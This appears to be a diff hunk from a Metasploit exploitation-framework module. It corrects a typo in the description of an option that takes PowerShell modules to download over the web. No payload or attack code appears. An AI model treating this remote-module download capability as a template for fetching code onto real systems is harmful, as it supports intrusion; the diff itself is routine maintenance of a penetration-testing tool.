@@ -36,7 +36,7 @@ module MetasploitModule
       'Payload'       => { 'Payload' => '' }
       ))
       register_options( [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
       ])
   end
 
